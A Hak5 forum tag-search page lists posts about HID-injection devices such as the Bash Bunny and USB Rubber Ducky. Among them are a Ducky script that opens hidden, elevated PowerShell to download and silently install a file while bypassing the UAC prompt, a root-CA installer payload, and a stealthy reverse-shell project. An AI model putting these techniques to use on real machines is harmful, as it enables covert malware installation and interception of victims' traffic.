Jump to content
Hak5 Forums

Search the Community

Showing results for tags 'HID'.



More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Talk
    • Everything Else
    • Gaming
    • Questions
    • Business and Enterprise IT
    • Security
    • Hacks & Mods
    • Applications & Coding
    • Trading Post
  • WiFi Pineapple
    • WiFi Pineapple TETRA
    • WiFi Pineapple NANO
    • WiFi Pineapple Mark V
    • WiFi Pineapple Mark IV
    • Pineapple Modules
    • WiFi Pineapple University
    • WiFi Pineapples Mark I, II, III
  • Hak5 Gear
    • Bash Bunny
    • Packet Squirrel
    • LAN Turtle
    • USB Rubber Ducky
  • Hak5 Shows
    • Hak5
    • HakTip
    • Metasploit Minute
    • Threatwire
  • Community
    • Forums and Wiki
    • #Hak5
  • Projects
    • SDR - Software Defined Radio
    • Community Projects
    • Interceptor
    • USB Hacks
    • USB Multipass
    • Pandora Timeshifting

Found 19 results

  1. [PAYLOAD] RevShellBack

    Discussion thread for the RevShellBack payload. I've seen quite a few Rubber Ducky projects to do with getting a reverse shell running on a PC so that the shell can be accessed remotely on a different computer. But what got me thinking is this: the Bash Bunny is a full-on Linux ARM computer, right? It has netcat and it can do HID and ethernet simultaneously. So.. why not use that instead? At first, this payload will use a bit of HID trickery to hide itself from an observer as best as it can. As soon as it has done executing the final PowerShell command, HID is no longer used. User-defined commands will be sent to the computer in the background. By default, 4 commands are executed as a demo: Write file (with content) to the desktop Eject CD/DVD tray (if it exists) -- thank PowerShell for making that possible Open calculator application Message box -- powered by PowerShell For information about the payload, the payload script itself and how to configure it, it can be found at this GitHub repository: https://github.com/NodePoint/RevShellBack
  2. Testing the BashBunny for use on a physical pentest/red team engagement but noticing a huge problem with using this device for a real world assessment. Mainly, on a Windows 7 x64 desktop, the initial driver install process took over 2 minutes to install. After initial drivers are installed, my payload initializes and finishes within 10 seconds which is great if only I didn't have to install the drivers first... What makes this issue even worse is that the BashBunny doesn't wait until the drivers have been installed before executing the payload which means you need to unplug/re-plug the device in after waiting 2 minutes to execute the payload. Ideally, it would be nice to build some code into the BashBunny to automatically detect when the drivers are installed and then run the payload. Has anyone had any issues with this and is there any way to improve the speed here? 2 minutes is wayyy to long to wait around at an unlocked workstation. I would be better off typing out the payload by hand if it meant only taking 20-30 seconds max.
  3. Well i'm not gonna lie I first saw this on another YouTube channel by the name Seytonic and I originally wasn't gonna show how to flash this and just demonstrate the various ducky code to Digispark code converters that came out since his video but I still hope you all enjoy and learn something from this video. PS: This device isn't as good as the USB Rubber Ducky but it's still very useful and cheap enough that if you lose it you got nothing to worry about. Click here for all links for all drivers and converters used in the video.
  4. Run admin Executable

    Hi, There is something i dont understand with the bash bunny... i dont know i feel like its too hard for my brain to understand how it works compared to the Rubber Ducky so i need some help I have this on a rubber ducky its pretty basic and does what i want: Starting an admin powershell Asking for admin and THEN running my command ( download a file output that file and run it quietly ) DELAY 1500 GUI r DELAY 1000 STRING Powershell -WindowStyle Hidden -Command "Start PowerShell -WindowStyle Hidden -Verb RunAs ""& "(New-Object System.Net.WebClient).DownloadFile('LINKHERE', '$env:temp\g.msi'); Start %temp%\g.msi /qn"" ENTER DELAY 1000 ALT o ALT y So How would be the best way to do that without requiring the download because the file will be on the Bash Bunny either inside or on the storage? THE POWERSHELL HAS TO BE ADMIN or the program wont install correctly. i cant get to open an admin powershell and then get the drive letter and execute my program all on one line and ask for approval before actually installing the program ( time saver ) Thanks Alot
  5. The HID is coming from inside the Bunny!

    Is there a way from the Bash Bunny shell to control what the Bash Bunny "does to" the host? For example, if my payload just checks the OS version, connects to a Bash Bunny shell and starts a new script based on that? As one simple example, determining Windows XP (UAC evasion not required) vs Windows 7+ could be useful. Another case might be defaulting to, and then unloading, the ECM_ETHERNET module and replacing it with the RNDIS if we detect that we are on Windows. I realize that the latter case might be better handled using the Switch to change payloads... but doing something like I'm thinking could give me, effectively, more than 2 payloads. If I'm not using the right terminology I apologize... I'm just getting started. I can't find anything by searching but I could be looking for the wrong thing... In the long run some way to control what the Bunny does based on the Host OS would be useful. Thanks!
  6. Hi, My problem is that when i tried : ATTACKMODE HID STORAGE DUCKY_LANG ca LED R B QUACK DELAY 1500 LED B QUACK GUI r LED G QUACK DELAY 1000 LED R FAST QUACK STRING Powershell -WindowStyle............insert the magic here QUACK ENTER LED R G B It stays blinking red fast... indefinitely tried a couple things but idk is it related to my language been bad ? because in the languages i do have all the languages...
  7. Violation of CoC

    Violation of CoC
  8. Violation of CoC

    Violation of CoC
  9. Teensy or Rubber Ducky?

    I have recently found an article by Samy Kamkar regarding HID exploitation and was wondering which is better. (i understand preference but im more interested in the speed and flexibility aspect of the two as well as ease of deployment) Also, i was wondering if there was a way to turn a teensy into a faux Rubber ducky in regards to making it possible to use the Rubber Ducky coding language on a teensy?
  10. [PAYLOAD] UnifiedRickRoll

    In the spirit of April fools, I've thrown together a payload that will rick roll every device you plug into at a specified time. It types up a script in the terminal (which at the specified time will crank up the volume and rick roll the target), runs it, sends it to the background, and closes the terminal so that the process can sit until the trigger time. Let me know if you'd like to see this do anything more! https://github.com/hak5/bashbunny-payloads/pull/139
  11. Violation of CoC

    Violation of CoC
  12. Violation of CoC

    Violation of CoC
  13. [Payload] Rooter

    Discussion Thread for Root CA installer. (No Local Admin Rights necessary) current development via: https://github.com/jrsmile/bashbunny-payloads/tree/master/payloads/library/rooter (TESTED and Working) pull request waiting. small Howto create self-signed-root-ca: Create the Root Certificate (Done Once) Creating the root certificate is easy and can be done quickly. Once you do these steps, you’ll end up with a root SSL certificate that you’ll install on all of your desktops, and a private key you’ll use to sign the certificates that get installed on your various devices. Create the Root Key The first step is to create the private root key which only takes one step. In the example below, I’m creating a 2048 bit key: openssl genrsa -out rootCA.key 2048 The standard key sizes today are 1024, 2048, and to a much lesser extent, 4096. I go with 2048, which is what most people use now. 4096 is usually overkill (and 4096 key length is 5 times more computationally intensive than 2048), and people are transitioning away from 1024. Important note: Keep this private key very private. This is the basis of all trust for your certificates, and if someone gets a hold of it, they can generate certificates that your browser will accept. You can also create a key that is password protected by adding -des3: openssl genrsa -des3 -out rootCA.key 2048 You’ll be prompted to give a password, and from then on you’ll be challenged password every time you use the key. Of course, if you forget the password, you’ll have to do all of this all over again. The next step is to self-sign this certificate. openssl req -x509 -new -nodes -key rootCA.key -sha256 -days 1024 -out rootCA.pem This will start an interactive script which will ask you for various bits of information. Fill it out as you see fit. You are about to be asked to enter information that will be incorporated into your certificate request. What you are about to enter is what is called a Distinguished Name or a DN. There are quite a few fields but you can leave some blank For some fields there will be a default value, If you enter '.', the field will be left blank. ----- Country Name (2 letter code) [AU]:US State or Province Name (full name) [Some-State]:Oregon Locality Name (eg, city) []:Portland Organization Name (eg, company) [Internet Widgits Pty Ltd]:Overlords Organizational Unit Name (eg, section) []:IT Common Name (eg, YOUR name) []:Data Center Overlords Email Address []:none@none.com Once done, this will create an SSL certificate called rootCA.pem, signed by itself, valid for 1024 days, and it will act as our root certificate. The interesting thing about traditional certificate authorities is that root certificate is also self-signed. But before you can start your own certificate authority, remember the trick is getting those certs in every browser in the entire world.
  14. Violation of CoC

    Violation of CoC
  15. Is this a Vulnerability for ducky?

    So, I'm not sure what to make of this. Maybe it's nothing. My friend was setting up a bunch of dells and noticed this http://www.dell.com/support/home/us/en/04/Drivers/DriversDetails?driverId=5DD13 it looks like just another driver, but HID and BIOS got me wondering. I found this link http://h20564.www2.hp.com/hpsc/swd/public/detail?swItemId=ob_150812_1 that gives a better description. I couldn't find anything online about what BIOS HID commands there could be. Why would the BIOS need access to HID? If it does have access, what keys does it have, and how do computers interpret them? Could this be exploited? I honestly can't find anything else, but I thought I'd post this in case anyone knows what it actually does and can debunk my curiosity.
  16. KeeLog Keyboard Logger

    First off, thank you for creating such a remarkable device! I haven't stopped playing with this since it arrived yesterday afternoon. :) I have a USB keylogger from KeeLog.com and I either forgot the password or else there is something wrong with the unit. It's been a few years since I last played with it so I don't know what its issue is wrt the keyboard sequence. The way it works is that it passes though your keyboard to the host computer while logging the input. If you simultaneously press the secret keys, it will register the keylogger as a storage device. By default the secret keyboard sequence is KBS. Now these keys need to be pressed simultaneously and not one after the other. Therefore "QUACK STRING KBS" wont' work. I copied a snippit of the Ducky script for my purposes to being able to send raw keyboard sequences. Here is a script I named "K" to send these raw sequences: #!/usr/bin/env python import sys def hidg_write(elements): values = bytearray(elements) not_hold = bytearray([0, 0, 0, 0, 0, 0, 0, 0]) hidg = open("/dev/hidg0", "wb") hidg.write(values) hidg.write(not_hold) hidg.close() elements = sys.argv[1:] elements = [int(i, 16) for i in elements] hidg_write(elements) I then created the following NodeJS application to return every keyboard combination/ The output is a valid payload.txt. The "Combinatorics.bigCombination" returns a sequence that doesn't repeat. Therefore there would only be a entry for "KBS" and not for "SBK" or "KSB", etc. var Combinatorics = require('js-combinatorics'); console.log("source bunny_helpers.sh"); console.log("ATTACKMODE HID"); console.log("LED R"); console.log("QUACK DELAY 5000"); console.log("LED B 200"); var cmb, a; cmb = Combinatorics.bigCombination(["04", "05", "06", "07", "08", "09", "0a", "0b", "0c", "0d", "0e", "0f", "10", "11", "12", "13", "14", "15", "16", "17", "18", "19", "1a", "1b", "1c", "1d"], 3); while(a = cmb.next()) { console.log("K 00 00 " + a.join(" ") + " 00 00 00"); console.log("Q DELAY 500"); console.log("Q ENTER"); } console.log("LED G"); Connected to my keylogger, powered up the BashBunny to my attack switch, opened up a text editor to collect all of the key sequences... and while it went through each combination and correctly typed it into my editor... it didn't unlock the keylogger. :( While I'll continue with inserting additional delays, random keys, etc... I'm throwing this out here in hopes that someone may be able to see why this won't open up my keylogger. Thanks!
  17. Violation of CoC

    Violation of CoC
  18. Hey, folks. I've tried using my LAN Turtle on a few engagements now, and while it's nice to show it plugged into a computer in the report, I rarely get much love out of it, and the shell feels too slow to be useful (guess that's why it's called a LAN Turtle! - It's a really slow shell!) Anyway - The idea that I wanted to float today is whether or not it would be possible to turn the LAN Turtle into a "TwinTurtle", similar to the "TwinDuck" firmware for the USB Rubber Ducky, but in this case, the LANTurtle would continue to be a USB-to-Ethernet adapter as well as acting as a HID device, so you could have a "blind terminal" into the machine it's physically plugged into. This could allow direct exploitation of the machine through powershell meterpreter, for example - The only problem I can think of is how to tell if the device is actually unlocked before sending the commands. So the reason I'm bringing this here is that I don't currently have the know-how to write a custom firmware which implements this sort of functionality, but I wanted to bring up the idea to the community, to see if this is something that is even possible, and if there are people willing and able to implement it.
  19. Introducing the latest Composite Firmware - Codename : The Twin Duck The Ducky primarily acts as a USB Mass Storage Device, and on a click of the button will start emulating a Keyboard. Its multi-OS, multi-lingual and comes in three flavours: c_duck_v2.hex - Supports DuckyScript as HID payload, triggered automatically and on GPIO (limited instructions) c_duck_v2_S001.hex - Triggered on CAPS/NUM/SCROLL LOCK c_duck_v2_S002.hex - Triggered on Ducky's GPIO only! Depending on your circumstances, you may want to use either one of these available firmwares. Downloads http://code.google.c.../downloads/list Please test and post feedback here. Snake
×